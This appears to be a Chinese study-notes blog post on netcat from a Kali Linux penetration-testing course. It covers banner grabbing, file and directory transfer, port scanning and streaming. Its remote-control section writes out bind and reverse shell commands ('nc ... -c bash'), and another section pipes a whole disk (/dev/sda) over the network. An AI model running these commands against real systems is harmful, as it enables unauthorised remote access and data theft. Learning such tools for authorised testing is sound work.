第五章 kali Linux 渗透测试基本工具NC

NETCAT——NC
~网络工具中的瑞士军刀——小身材、大智慧
~侦听模式/传输模式
~telnet / 获取banner信息
~传输文本信息
~传输文件/目录
~加密传输文件
~远程控制/木马
~加密所有流量
~流媒体服务器
~远程克隆硬盘

1、telnet/ banner

以链接163邮箱服务器为例:
寻找pop3的IP解析出来
ping pop3.163.com

nc-vn 123.125.50.29 110
查看到服务器的banner信息
然后进行命令的输入

USER(先用base64来得到 base64编码 后的字符 如[email protected],再用编码后的字符输入。密码也是如此)
可以用来接收邮件

nc -nv 123.125.50.138 25
访问stmp

输入ehlo查询命令,正确输入邮件格式

NC——传输文本信息 tcp方式

A: nc -l -p 4444 侦听一个4444端口,服务端

B: nc -nv IP地址(A) 4444 客户端

A : nc -l -p 333 > ps.txt(将输出的内容 存到ps.txt文件上)

B : ps aux | nc -nv IP(A) 333 -q 1

收集相关的信息

ps:(ps aux查看是否有可疑进程)

NC——传输文件/目录

~ 传输文件
~ A: nc -lp 333 > 1.mp4 接收端
~ B:nc -nv IP(A) 333 < 1.mp4 -q 1 发送端
or
~ A:nc -q 1 -lp 333 < a.mp4 发送端
~ B:nc -nv IP(A) 333 > 2.mp4
~ 传输目录
~ A: tar -cvf -music/ | nc -lp 333 -q 1
~ B: nc -nv IP(A) 333 | tar -xvf -
~ 加密传输文件
~ A: nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256-m ecb > 1.mp4
~ B : mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv IP 333 -q 1

NC——流媒体服务
~ A: cat 1.mp4 | nc -lp 333
~ B: IP 333 | mplayer -vo x11 -cache 3000 -
NC——端口扫描
~ nc -nvz IP 1-65535
~ nc -vnzu IP 1-1024
NC——远程克隆硬盘
~ A : nc -lp 333 | dd of=/dev/sda
~ B : dd if=/dev/sda | nc -nv IP 333 -q 1
远程电子取证 ,可以将目标服务器硬盘远程复制, 或内存

NC——远程控制
~正向:
~ A : nc -lp 333 -c bash
~ B : nc IP 333
~ 反向:
~ A : nc -lp 333
~ B : nc IP 333 -c bash
~注:Windows用户把bash改成cmd

非原创
本文来自与苑老师的视频,我只是总结学习。

猜你喜欢

转载自blog.csdn.net/qq_41605241/article/details/88878815